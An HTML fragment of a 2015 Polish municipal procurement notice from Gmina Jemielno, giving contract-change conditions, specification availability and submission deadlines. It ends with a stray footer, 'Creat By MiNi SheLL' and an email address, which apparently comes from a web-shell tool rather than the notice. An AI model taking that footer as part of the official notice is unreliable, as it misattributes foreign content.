<li>2 - Termin realizacji - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>.Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli zajdzie którykolwiek z niżej wymienionych warunków:
2.1.Nastąpi konieczność dokonania zmiany terminu wykonania  na skutek:
a)warunków atmosferycznych uniemożliwiających ze względów technologicznych wykonanie przedmiotu umowy w ustalonym terminie lub wpływających negatywnie na jakość wykonania lub trwałość przedmiotu umowy;
b)warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych, przeprowadzenie prób i sprawdzeń, dokonywanie odbiorów;
b)klęsk żywiołowych;
2.2.Zmiany spowodowane brakiem dostępu do lokali mieszkalnych, a w szczególności:
a)Wyjazd lokatora bez wcześniejszego uzgodnienia z Zamawiającym,
b)Wypadki losowe opóźniające realizację umowy,
c)Wystąpienie  zdarzeń wymuszających  przerwę w realizacji zamówienia niezależnej od Wykonawcy,
2.3.  Zmiany będące następstwem działania osób trzecich.
2.4.  Zmiana sposobu spełniania wykonania przedmiotu umowy - zmiany technologiczne:
a) Niedostępność na rynku materiałów lub urządzeń wskazanych w ofercie, dokumentacji projektowej lub technicznej, spowodowana zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń, 
b) Pojawienie się na rynku materiałów, części lub urządzeń nowszej generacji pozwalających na zmniejszenie kosztów eksploatacji wykonanego przedmiotu umowy,
c) Konieczność zrealizowania remontu przy zastosowaniu innych rozwiązań technicznych, technologicznych niż wskazane w ofercie w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem remontu,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jemielno.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Jemielno, Jemielno 81 56-209 Jemielno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2015 godzina 09:00, miejsce: Urząd Gminy Jemielno, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com